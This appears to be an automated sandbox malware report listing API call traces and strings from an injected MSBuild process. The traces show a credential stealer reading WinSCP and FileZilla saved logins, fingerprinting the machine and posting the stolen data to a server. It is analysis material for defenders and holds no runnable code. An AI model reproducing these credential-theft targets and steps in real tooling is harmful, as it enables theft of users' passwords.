                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                            • String ID: p$ s$(q$0r$8:$8;$8<$8p$8s$@q$Hr$HttpQueryInfoA$InternetSetOptionA$Pp$SymMatchString$X;$X<$Xq$`r$dbghelp.dll$hp$pq$p$x:$x<$xo$xr$$p$q
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040C42B
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040C44A
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040C462
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040C47A
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040C48D
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040C49B
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040C4AC
                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,"@), ref: 0040C4CE
                                                                                                                                                                                                                                                                            • RegGetValueA.ADVAPI32("@,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040C50F
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32("@), ref: 0040C51D
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32("@), ref: 0040C52D
                                                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,"@), ref: 0040C547
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: memset$CloseOpen$Value
                                                                                                                                                                                                                                                                            • String ID: "@$:22$Host: $HostName$Login: $Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 00404482
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040448F
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040449C
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044B6
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: InternetCrackUrlA.WININET(00000000,00000000), ref: 004044C6
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC6
                                                                                                                                                                                                                                                                              • Part of subcall function 00411720: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00411744
                                                                                                                                                                                                                                                                              • Part of subcall function 00411720: GetProcessHeap.KERNEL32(00000000,?,?,00404EBA,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00411753
                                                                                                                                                                                                                                                                              • Part of subcall function 00411720: HeapAlloc.KERNEL32(00000000,?,?,00404EBA,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041175A
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00E39A60,00426897,00426893,0042688B,00426887,00426886), ref: 00404F51
                                                                                                                                                                                                                                                                            • InternetOpenA.WININET(00000000,00000001,?,?,?), ref: 00404F77
                                                                                                                                                                                                                                                                            • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004050A1
                                                                                                                                                                                                                                                                            • HttpOpenRequestA.WININET(00000000,00E39900,?,00E39E50,00000000,00000000,-00400100,00000000), ref: 004050E2
                                                                                                                                                                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405108
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,00E30030,00000000,?,00426950,00000000,?,?), ref: 00405600
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 00405612
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00405625
                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040562C
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 0040563E
                                                                                                                                                                                                                                                                            • memcpy.MSVCRT ref: 00405652
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,?,?), ref: 0040566B
                                                                                                                                                                                                                                                                            • memcpy.MSVCRT ref: 00405675
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 00405686
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0040569F
                                                                                                                                                                                                                                                                            • memcpy.MSVCRT ref: 004056AC
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,?,00000000), ref: 004056C2
                                                                                                                                                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004056D3
                                                                                                                                                                                                                                                                            • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 004056FB
                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,000007CF,00000000), ref: 00405744
                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,00000000,000007CF,00000000), ref: 0040579B
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,block), ref: 004057B3
                                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 004057BE
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 004057CF
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrlen$Internet$lstrcpy$Heap$HttpProcessmemcpy$AllocFileOpenReadRequestlstrcat$BinaryCloseConnectCrackCryptExitHandleInfoOptionQuerySendString
                                                                                                                                                                                                                                                                            • String ID: ------$"$"$"$"$--$------$------$------$------$0$ERROR$ERROR$`h$block$build_id$file_data
                                                                                                                                                                                                                                                                            • API String ID: 1603122859-2017580602
                                                                                                                                                                                                                                                                            • Opcode ID: 1101776c67f9eaf2207cb236d24d32091fa0778eb9b540aedaa0788034abeadb
                                                                                                                                                                                                                                                                            • Instruction ID: 540930a84d7bb7e5f2c659243df0843e1f0a5bb5435f8e757a205e5e1652ed83
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1101776c67f9eaf2207cb236d24d32091fa0778eb9b540aedaa0788034abeadb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 67622E71801149EADB15EBA1C951BEEBBB8AF19304F50407EE601731D2DF786A4CCBB5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%


                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                              • Part of subcall function 00411670: SHGetFolderPathA.SHELL32(00000000,.kB,00000000,00000000,?,00000000), ref: 004116A8
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                              • Part of subcall function 00406E80: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000), ref: 00406EB7
                                                                                                                                                                                                                                                                              • Part of subcall function 00406E80: GetFileSizeEx.KERNEL32(00000000,?,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406ECD
                                                                                                                                                                                                                                                                              • Part of subcall function 00406E80: LocalAlloc.KERNEL32(00000040,?,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406EE8
                                                                                                                                                                                                                                                                              • Part of subcall function 00406E80: ReadFile.KERNEL32(00000000,00000000,?,00000002,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F01
                                                                                                                                                                                                                                                                              • Part of subcall function 00406E80: CloseHandle.KERNEL32(00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F29
                                                                                                                                                                                                                                                                              • Part of subcall function 004116D0: LocalAlloc.KERNEL32(00000040,?,?,00000001,00000004,?,00413C40,00000000,00000000), ref: 004116EC
                                                                                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 0040C989
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,000F423F,00426B36,00426B33,00426B32,00426B2F), ref: 0040C9DF
                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C9E6
                                                                                                                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040CA06
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA11
                                                                                                                                                                                                                                                                              • Part of subcall function 00411B50: malloc.MSVCRT ref: 00411B61
                                                                                                                                                                                                                                                                              • Part of subcall function 00411B50: strncpy.MSVCRT ref: 00411B71
                                                                                                                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040CA48
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA53
                                                                                                                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,<User>), ref: 0040CA90
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA9B
                                                                                                                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040CAD8
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CAE7
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CB73
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CB8B
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CBA3
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CBBB
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00418083,Soft: FileZilla), ref: 0040CBD3
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00418083,Host: ), ref: 0040CBE2
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00418083,00000000), ref: 0040CBF5
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00418083,00426F08), ref: 0040CC04
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00418083,00000000), ref: 0040CC17
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00418083,00426F0C), ref: 0040CC26
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00418083,Login: ), ref: 0040CC35
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00418083,00000000), ref: 0040CC48
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00418083,00426F18), ref: 0040CC57
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00418083,Password: ), ref: 0040CC66
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00418083,00000000), ref: 0040CC79
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00418083,00426F28), ref: 0040CC88
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00418083,00426F2C), ref: 0040CC97
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FEB0: lstrlen.KERNEL32(00418579,?,00000000,?,00417CAD,00427387,00427386,00000000,?,00000000,00422CB8,000000FF,?,00418579), ref: 0040FEBB
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FEB0: lstrcpy.KERNEL32(00000000,00418579), ref: 0040FEF2
                                                                                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 0040CCDB
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00418083,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CCF1
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040CD42
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcat$lstrlen$lstrcpy$AllocFile$HeapLocalstrtok_s$CloseCreateFolderHandlePathProcessReadSizemallocmemsetstrncpy
                                                                                                                                                                                                                                                                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$>kB;kB:kB$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                                                                                                                                                                                                            • API String ID: 433178851-2340581703
                                                                                                                                                                                                                                                                            • Opcode ID: 0864dcb1a903e9fa47c799f6ead7014f60aaf1fdb1e7a25ab1264df11e5aa3c5
                                                                                                                                                                                                                                                                            • Instruction ID: d11abaa09dd60fea0b83d1247216ad2e93eb725a93b7f2adba71b57396a44103
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0864dcb1a903e9fa47c799f6ead7014f60aaf1fdb1e7a25ab1264df11e5aa3c5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BAE19275D00218AACB14EBE0DD56BEEBB79AF19304F50046EF501B31D2DF786A08CB69
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph 569, block 405ce0-405dd2; legend: Executed / Not Executed. Graph image not recoverable.]
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 00404482
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040448F
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040449C
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044B6
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: InternetCrackUrlA.WININET(00000000,00000000), ref: 004044C6
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405DAA
                                                                                                                                                                                                                                                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405F54
                                                                                                                                                                                                                                                                            • HttpOpenRequestA.WININET(00000000,00E39900,?,00E39E50,00000000,00000000,-00400100,00000000), ref: 00405F94
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,00000000,004201C1,?,00000000,004201C1,",00000000,004201C1,mode,00000000,004201C1,00E30030,00000000,004201C1,004269D8), ref: 00406392
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004063A3
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004063AE
                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004063B5
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004063C6
                                                                                                                                                                                                                                                                            • memcpy.MSVCRT ref: 004063D7
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004063E8
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406401
                                                                                                                                                                                                                                                                            • memcpy.MSVCRT ref: 0040640A
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0040641D
                                                                                                                                                                                                                                                                            • HttpSendRequestA.WININET(?,00000000,00000000), ref: 00406431
                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(?,?,000000C7,00000000), ref: 00406448
                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(?,00000000,000000C7,00000000), ref: 0040649E
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 004064A9
                                                                                                                                                                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405FBB
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 004064B6
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 004064C0
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00E39A60,?,?,?,?,?,?,00000000), ref: 00405DCA
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Internet$lstrlen$lstrcpy$CloseHandle$FileHeapHttpOpenReadRequestlstrcatmemcpy$AllocConnectCrackOptionProcessSend
                                                                                                                                                                                                                                                                            • String ID: "$"$"$*$------$------$------$------$`h$build_id$mode
                                                                                                                                                                                                                                                                            • API String ID: 530647464-2951147139
                                                                                                                                                                                                                                                                            • Opcode ID: 089763e1180469b060daa2b051b084847cdfeb38a2f1139273a97ad74b024327
                                                                                                                                                                                                                                                                            • Instruction ID: a08b747351f3a96535aba500675343c14e4fcb34faea4da8f047a2726442ef11
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 089763e1180469b060daa2b051b084847cdfeb38a2f1139273a97ad74b024327
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 10522D71801149EACB15E7E5C952BEEBBB89F19304F54407EE60173192DF782B4CCAB9
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph 912, block 415660-41649f; legend: Executed / Not Executed. Graph image not recoverable.]
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                              • Part of subcall function 004102A0: GetProcessHeap.KERNEL32(00000000,00000104,?,00427398,00000000,?,00000000,00000000), ref: 004102AE
                                                                                                                                                                                                                                                                              • Part of subcall function 004102A0: HeapAlloc.KERNEL32(00000000,?,00427398,00000000,?,00000000,00000000), ref: 004102B5
                                                                                                                                                                                                                                                                              • Part of subcall function 004102A0: GetLocalTime.KERNEL32(00427398,?,00427398,00000000,?,00000000,00000000), ref: 004102C1
                                                                                                                                                                                                                                                                              • Part of subcall function 004102A0: wsprintfA.USER32 ref: 004102ED
                                                                                                                                                                                                                                                                              • Part of subcall function 00410C30: memset.MSVCRT ref: 00410C55
                                                                                                                                                                                                                                                                              • Part of subcall function 00410C30: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,00000000), ref: 00410C72
                                                                                                                                                                                                                                                                              • Part of subcall function 00410C30: RegQueryValueExA.KERNEL32(00000000,MachineGuid,00000000,00000000,00000000,000000FF), ref: 00410C94
                                                                                                                                                                                                                                                                              • Part of subcall function 00410C30: RegCloseKey.ADVAPI32(00000000), ref: 00410C9E
                                                                                                                                                                                                                                                                              • Part of subcall function 00410C30: CharToOemA.USER32(00000000,?), ref: 00410CB2
                                                                                                                                                                                                                                                                              • Part of subcall function 00410CD0: GetCurrentHwProfileA.ADVAPI32(?), ref: 00410CE5
                                                                                                                                                                                                                                                                              • Part of subcall function 00410D30: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00410D68
                                                                                                                                                                                                                                                                              • Part of subcall function 00410D30: GetVolumeInformationA.KERNEL32(00421A29,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410DA1
                                                                                                                                                                                                                                                                              • Part of subcall function 00410D30: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410DED
                                                                                                                                                                                                                                                                              • Part of subcall function 00410D30: HeapAlloc.KERNEL32(00000000), ref: 00410DF4
                                                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,004273D0,00000000,?,00000000,00000000,00000000,00000000), ref: 0041599B
                                                                                                                                                                                                                                                                              • Part of subcall function 004119C0: OpenProcess.KERNEL32(00000410,00000000,?), ref: 004119DC
                                                                                                                                                                                                                                                                              • Part of subcall function 004119C0: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 004119F7
                                                                                                                                                                                                                                                                              • Part of subcall function 004119C0: CloseHandle.KERNEL32(00000000), ref: 004119FE
                                                                                                                                                                                                                                                                              • Part of subcall function 00410EE0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410EF5
                                                                                                                                                                                                                                                                              • Part of subcall function 00410EE0: HeapAlloc.KERNEL32(00000000), ref: 00410EFC
                                                                                                                                                                                                                                                                              • Part of subcall function 00411020: CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?,Work Dir: In memory,00000000,?,004273DC,00000000), ref: 00411043
                                                                                                                                                                                                                                                                              • Part of subcall function 00411020: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,Windows: ,00000000,?,004273F4), ref: 00411054
                                                                                                                                                                                                                                                                              • Part of subcall function 00411020: CoCreateInstance.OLE32(00427D04,00000000,00000001,00427C34,?,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?,Work Dir: In memory,00000000), ref: 0041106E
                                                                                                                                                                                                                                                                              • Part of subcall function 00411020: CoSetProxyBlanket.OLE32(004273DC,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,Windows: ,00000000,?,004273F4,00000000), ref: 004110A7
